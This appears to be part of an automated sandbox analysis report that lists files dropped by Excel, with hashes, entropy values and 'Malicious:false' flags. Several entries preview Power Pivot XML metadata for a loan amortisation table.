                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1008
                                                                                                Entropy (8bit):7.16249840036433
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wiskp/K7rlPVPSJ1FUl0lY1gCPx/4kYuVgl:QhVPSzFUl0lAg8J4kBVE
                                                                                                MD5:EF4B56867EB9CAB291D0FA17E46EAC77
                                                                                                SHA1:AC2E3954A31523078B18A474A4EAB632014AEA17
                                                                                                SHA-256:16A3C3EABB58673F63079FC2B8331B8155B65856A8C5BA8ED99E00DE37DDE3EE
                                                                                                SHA-512:FCDE0258B8157D44AECD4A33F8A8184002206CFD0F22B1AEB518FE25904422382BA4D3722CDBD99BBD01060288D2917A95E564ECB7E1938493FD1A3A16CC6BF5
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1008
                                                                                                Entropy (8bit):7.2569813919866135
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wcGbLyFD8/a32tU7lDwSgPJ5nZw+WLGyq:lGqh8/C2GOPJ5nZw+WKy
                                                                                                MD5:A89BFF049C504CE1D8A67E088B1ED668
                                                                                                SHA1:B6B43B9E1D4936CDB6EEEE0DA43459169CDD1594
                                                                                                SHA-256:2458875CA28B0996E779BE02EC0970DBF4705E33320786C1819644B3BD5900E7
                                                                                                SHA-512:78A7A400FABB913C1BF6256CE9F3C2C0C458E890D9B98405203F6BA7B0EDC622FB41AC36B724AA07EBF9F82640FFC1C7F15D0BA61D511A3B61447B0BEE7E060E
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (119,0) Size=56x0
                                                                                                Category:dropped
                                                                                                Size (bytes):208
                                                                                                Entropy (8bit):1.9456656521696833
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RUUHljT3/:b3
                                                                                                MD5:62BAAF4B99B9CFE0E5BED08D9CEC5929
                                                                                                SHA1:EF651F7277651BDD75CF45434C027E1ED2016C4C
                                                                                                SHA-256:F2BFF7550D9267B714A1A8EBDC9C375515C8C8D6F56550FE514037F8E9A06EC4
                                                                                                SHA-512:E61FBDD3D4D6800D83E15193397EB626372BAFACBACE2AA3816CFC1605ABB24EDC5357E6FD248A32838B6DFF0F390E4A5863AD11D7502AA35C5BDCF78B415150
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\014, numeric, rows 4294967295, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.9356192331713595
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:BRF5ll/aad//Clvlllnl/bwl/W0l/D:79dXCl9vl/UFl/D
                                                                                                MD5:35A0B5521CE5C03975F9B086B409AB36
                                                                                                SHA1:760C29B59D320176807A22CCE26F1D17550EA1B0
                                                                                                SHA-256:2759A6489D196A9F6F4B08D379C21272E1A36ACFE0EAEDEAED4466828F2029A8
                                                                                                SHA-512:FCE43A0D2D55542E4F3E8DCB6902F9BC09C1BC5BB377EB6F1F97F4B0F858890DDA9F817CA21C78EBFEAC591D30512031A745CECF6141DECEBB3F6364FE465AE2
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (119,0) Size=56x0
                                                                                                Category:dropped
                                                                                                Size (bytes):208
                                                                                                Entropy (8bit):1.9456656521696833
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RUUHljT3/:b3
                                                                                                MD5:62BAAF4B99B9CFE0E5BED08D9CEC5929
                                                                                                SHA1:EF651F7277651BDD75CF45434C027E1ED2016C4C
                                                                                                SHA-256:F2BFF7550D9267B714A1A8EBDC9C375515C8C8D6F56550FE514037F8E9A06EC4
                                                                                                SHA-512:E61FBDD3D4D6800D83E15193397EB626372BAFACBACE2AA3816CFC1605ABB24EDC5357E6FD248A32838B6DFF0F390E4A5863AD11D7502AA35C5BDCF78B415150
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\014, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):315
                                                                                                Entropy (8bit):2.0912843590848316
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:aNdXrlC4eelRgPc1g3llQl5yltieWRru:a/rlC4AjlK2ixr
                                                                                                MD5:5197B874D9E9A0A16A92BA196B75699C
                                                                                                SHA1:1A5319BCB5B5B06EFEAC4B0E2705A730F3EE6A70
                                                                                                SHA-256:4528E43614E0FB4ED2ED7F44CC736A956F149CF2A81CE2BD755AC28E786134BD
                                                                                                SHA-512:961F3AE287289912C19B8BB1683171F6AD43346FFD7B54E170D9946E792ED4884D5EBC303DB6CAF9529A0D31FFBC15A4BE70AD210921F963C695AADD7A0A638E
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (117,0) Size=24x0
                                                                                                Category:dropped
                                                                                                Size (bytes):176
                                                                                                Entropy (8bit):1.34921410570366
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RQ5EtpllmRQQQQQQM:bWsERQQQQQQM
                                                                                                MD5:CD78447E8C150CB7B69CC96F9DB5F334
                                                                                                SHA1:F5F707364BF0887EB86E1FDED647F0930950BAF0
                                                                                                SHA-256:909DB2ADC474A0EE598ECAC9B8CC5942AA67D229167CB2A0771664A45AB288FF
                                                                                                SHA-512:F9A3C14096A2BE551CC20222D38DC53EA5BF5FF68A54D3507788273DB968E37E338A448C307987B40A0F404CF1CB7CF83737923304E41EC31E97A53C1DAF0CA3
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\004, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):195
                                                                                                Entropy (8bit):1.8818468619616826
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lslllt5ll/aaVt/lOtlelDllcenlzltllIlU/qLlXtSlWGxlR/1htlllPlAltFl:aNVtYKweCUgQWGj7rlO
                                                                                                MD5:6F1747CB374B298A95AC85503015C756
                                                                                                SHA1:FA8BF06CCA29B1A2A5914813E97634C76E9879B6
                                                                                                SHA-256:7304BC9A3140437E2F87B55840CDD1CEBC15D0AAA105761B2D72752015384C19
                                                                                                SHA-512:E7949004805A9D8C92AC91764C91A4B73BEA49BBFB02D180762D0A7854F4CFC313B8AE434CDA5DC74F31369FE24D8B4A2D5B3CF6576909A07DD9A72DEBF26E25
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=52x0
                                                                                                Category:dropped
                                                                                                Size (bytes):208
                                                                                                Entropy (8bit):1.9856570590492275
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlynlXdlONuhHr5DXSEptfJ9:bwAuF5eErJ9
                                                                                                MD5:4BC02E2ECCD18C7D03D237919DD24072
                                                                                                SHA1:E06F27E5D93F4F27BE99BAFF4D8A037F10D0AA2F
                                                                                                SHA-256:ED8E39237A33452D4D06275E8E1E94F240870C0795748099F86D4A847B8213BA
                                                                                                SHA-512:BEA34DE1F2799D74B70A652A74DAAF425E233869B68536C8939B919A1851883528F74C7568F95E9CB6EA56B5FAFAD85C70BF1F004668395576ADDF946915D3FE
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\013, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):321
                                                                                                Entropy (8bit):1.9327164878649103
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lslllt5ll/aaamtlel8l6enlYll5lvlalFZlFYlllXlPXlFWlF0lVlVlUlfl/lW:aNNK06eeOlcl/1+likbuueXQ
                                                                                                MD5:2E9DC952123E81934AF43214C969D8E7
                                                                                                SHA1:C6D64E923E87BE685EC32448267081EFA5B5BEB2
                                                                                                SHA-256:ACA67F452DC253F902A5E3F62D49D6181D0FDF62784D5FCC7AC0FA2313639EBF
                                                                                                SHA-512:8352A57DAAA0019F82EECB3F5CCD1411FC70DFB4C6028194E73C55947563693DE44E8FE28AFCA11A546DB0C4A62345816F93C54CDF939A8679435F46831C9A7A
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=12x0
                                                                                                Category:dropped
                                                                                                Size (bytes):344
                                                                                                Entropy (8bit):5.046589854425613
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:bVWmXFJzf1q+IrxVAWcHzcntEsZvfCp65gdSZm+4:pJzbxIrxaeEswpR
                                                                                                MD5:BC0437CFA35DCE2D28DAB8DE2AA58785
                                                                                                SHA1:3FD4570907178732787C9ED6BBA2F6DED7DE394C
                                                                                                SHA-256:32EF8D4E003379D5D51A3BA15C03EDC648F35B9033DAEC88EAD7CB26B80EBF2F
                                                                                                SHA-512:3397177E759E3241F9C0BB8FC18567FF9875FF1D4E0218982C00C3D343CB8B9F42FA4C41410C0804131E0E7B6E6A778AC41190BB7A47BE71A09C92098CCF18A7
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=16x0
                                                                                                Category:dropped
                                                                                                Size (bytes):152
                                                                                                Entropy (8bit):0.34191181872988474
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fllwlltcl:R
                                                                                                MD5:C1C2835D23ADA785A5B5D092D0A0A4F1
                                                                                                SHA1:B18F1C269FE56E8BEE602F60690033650DC0C329
                                                                                                SHA-256:1085F2BA46BC19939AE47FE6535CFD43C8B268E3BDC5E0392076594A1ECA524B
                                                                                                SHA-512:C72B6E423475D855A619C571F963261D89106D9425363ACB6AC35C258E7E1E82B221EA32C771A74EAB9AC7DCCD011BAEC658FCC8FBC9E19713C2E8DF304F4725
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377\002, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):56
                                                                                                Entropy (8bit):2.3747429956842208
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:b8H/ull/RTnlDwallX:b8H2lpRTxwq
                                                                                                MD5:EA4A39D272E86C36E76C3C71C374A1AE
                                                                                                SHA1:74C90FE028A7279A7924BB208EDC8FEBE3FCBC98
                                                                                                SHA-256:FC0CB0C51471BFCCC0725CC478D232C4B7C4BF2EDA48DA0C0ABD370B77739DC6
                                                                                                SHA-512:7E7E049609B308ED3377AD22AEDC73F411BAAAADD24F68475BA423A7A2B4E5C53FD0D0F659F4CA8F1435E8327021A39301DC079E9F1E9A3EF87FDE21F9BBBD1D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1837
                                                                                                Entropy (8bit):2.057850197243142
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rXllePF1G5OAt+Bz9IMyd+G5GeUXAP/PfDyGyeyE48Q0Is1:r1lSQn+Bz9IMPG5nUYXXyozjz1
                                                                                                MD5:FA8B2FA5EADB29B97555FE5FF07716AE
                                                                                                SHA1:6EBA2987085F658FD0E889B7E5BA1ABC84487FE7
                                                                                                SHA-256:A252BE9320753A7C40C27AC7E972C7ADB78B0B3417048082A2E67C01B591758E
                                                                                                SHA-512:EDC5D0CFEEA7764CD213A625DCC68D1D4DDEDCBA55E779DBF1213416B5834F949B6D0AEF19037F3C06ED82FE82A3D835782E251233743F8B7AC57775743F959D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1008
                                                                                                Entropy (8bit):7.129210296528201
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:w87HSI+emVdgKEWpCF+rpnfBlXlDXTCp/cv/kQkHkBwZwZlpYr9P4+v:zSzFdXEUprXWyv8QkBZwZYrldv
                                                                                                MD5:63948E67DED5A1EEEA7C952171769070
                                                                                                SHA1:ED1B1A547EF52C4E9C7E9C5280641DB8D29CD538
                                                                                                SHA-256:928DBB4065F4576B65C4DFD0F084C3B4481FBD8256790EE0742C2203EAA9A796
                                                                                                SHA-512:66E165A240B8A168C4DA1A961DFF98DF954EC6B33C945D620463CDD65CC46CD0011DDF18A6DDABC78EBBAB0B80D0D0585232EF3A80BB92D003E4417F93DD599F
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (360,0) Size=0x0
                                                                                                Category:dropped
                                                                                                Size (bytes):144
                                                                                                Entropy (8bit):0.36138058918125576
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/R:b
                                                                                                MD5:64AB28E86840B315BDE94221AEF0AFA8
                                                                                                SHA1:2C85AB6D9BF1B19B54A03E29989AF9D8963DA19F
                                                                                                SHA-256:6C59C0DFBCB66E9D26AD9D6C2066B38505741686F15EC3852C207231BC686336
                                                                                                SHA-512:4693E83D5FD21A958428C7414D98D550BB1CFD99E2761C12E7610C0A85ED9621137486F0A079378AC09266B2863AF19FC21BB0DFE3CC76BCDDFB5093BF090BF7
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8705), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8705
                                                                                                Entropy (8bit):5.141793076541248
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:lIMckwYWKzDUTnKjivTnKjBD4FrTWWKzDUTnKjivTnKjBDcFrhN:EK4KWKWVK4KWKaD
                                                                                                MD5:0D26F96005DD569B3D93E11029160EBE
                                                                                                SHA1:D14A0DF692FA929FCEBD89C78FA3563B8B7B3083
                                                                                                SHA-256:A8C8036C5E321AEFB3DE0938D400C08EEDCBA1748467A16B5B2CB3D0F060019F
                                                                                                SHA-512:4AA004A1D20EC26F8790103399391CB1BC2408748409889DE6F484A31F0C22A399E63C656BBE542BFDE28FACA470DFFA93B98D745780DAC7A0254AD96BFAC538
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Beginning Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8699), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8699
                                                                                                Entropy (8bit):5.142480689136721
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:bIMckwYWKzDUTnKjivTnKjBDaFrTWWKzDUTnKjivTnKjBDeFrhN:eK4KWKkVK4KWKoD
                                                                                                MD5:58DE8DD72F18785D97B9928CD521D73E
                                                                                                SHA1:F0663FD6762B962A80E06037560716C204939068
                                                                                                SHA-256:9058C81EA6A35620A374775C603E5885A5AEF7BA802740986CBAC2E1F5C3A645
                                                                                                SHA-512:871F5520DD2AFD03D3EE3A69388F56507E965798443E3250E5EA8711CA45113A42C9962AA234A624E6C082AF8D372D4F1DA446FFED33E3F27A938567C45EF09C
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Ending Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSi
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8678), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8678
                                                                                                Entropy (8bit):5.139025538297742
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:KIMckwYWKzDUTnKjivTnKjBDTFrTWWKzDUTnKjivTnKjBDrFrhN:TK4KWKHVK4KWKfD
                                                                                                MD5:3012E1DFAB2F7B145795C5A407549760
                                                                                                SHA1:10110E5FF08F8DE17ECBFC691877B326A2E1C241
                                                                                                SHA-256:16F76D363916B8694799EBD11699498FF05E94CB72C414F45C9CF460634B7A0D
                                                                                                SHA-512:45C9124119FA970021C884208191FEE695323008C5E846E462B6D17358B25C3A234DC336FD8C3187645C7B380CBBFCFF3C1B5017927BECA8F96CA6485FEE4156
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Interest" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8728), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8728
                                                                                                Entropy (8bit):5.144878974566288
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:rI7kwYWKzD/TnKjivTnKjBDqFrTWWKzD/TnKjivTnKjBDuFrhN:iK7KWKwVK7KWKkD
                                                                                                MD5:18E771D5B3067F50C971F9EC55104A24
                                                                                                SHA1:125B26CBBC235E02BDB801A3F27041D2E3975B63
                                                                                                SHA-256:5E5DCF71BEA97900AE550AFB324B6EBC0518B01CAF789617FDA49D26126BEED7
                                                                                                SHA-512:CFF3A5CA9C6255637ED0EB3E73B3C3B7D6B2FD73600906EAF3689E8AAFF673E05A15C20A34A5148F5AB663DBBDAA601A659B8A0BA4C0328216A53C835EF27B61
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month Index)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8710), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8710
                                                                                                Entropy (8bit):5.144472421040484
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:PI7kwYWKzD/TnKjivTnKjBD2FrTWWKzD/TnKjivTnKjBDKFrhN:uK7KWKoVK7KWK8D
                                                                                                MD5:D9E5FFBFBACBB97271E17282DA5BC334
                                                                                                SHA1:8FE2D77890D929A3AF4B04D1E3F925EA30E17C0D
                                                                                                SHA-256:4F631B8127D4C3EB3E7D76052FE52164ED2FEEDC5FEF6F8F5EFB1C5D3E0555F0
                                                                                                SHA-512:FC5D31A00CB5673FA12ED00ED5ED88D0A895466C8BD1BA4DAD1533B9994D68B6EBAEEC747269FBDE31070AF4A39620A2E639173A6C22D7450A0DDFC954DF0533
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8712), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8712
                                                                                                Entropy (8bit):5.145396332911431
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:FIdkwYWKzDOTnKjivTnKjBDYFrTWWKzDOTnKjivTnKjBD8FrhN:yKCKWKaVKCKWKOD
                                                                                                MD5:D11B5E6A96287A751C083F8A98CC3D38
                                                                                                SHA1:3D9137704C1FB04A7060E0C97B6DE451A9246C1E
                                                                                                SHA-256:CC5D2E535DEB0F7A33E2B8E94504DE670F59A0953E0C428AABF738FB81AC89A0
                                                                                                SHA-512:53684E5C7E2C02B5CEE0F89BEE750F83908E3B93B573C7FD1415A55C2B1290E74EF12573B5EE9A2E2466926441F483F296B2BA7F65279D9144CB8C36882D39C4
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Quarter)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">7</Records><RecordsPerSegment xsi:type="xsd:long">4</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8707), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8707
                                                                                                Entropy (8bit):5.146420285168294
                                                                                                Encrypted:false
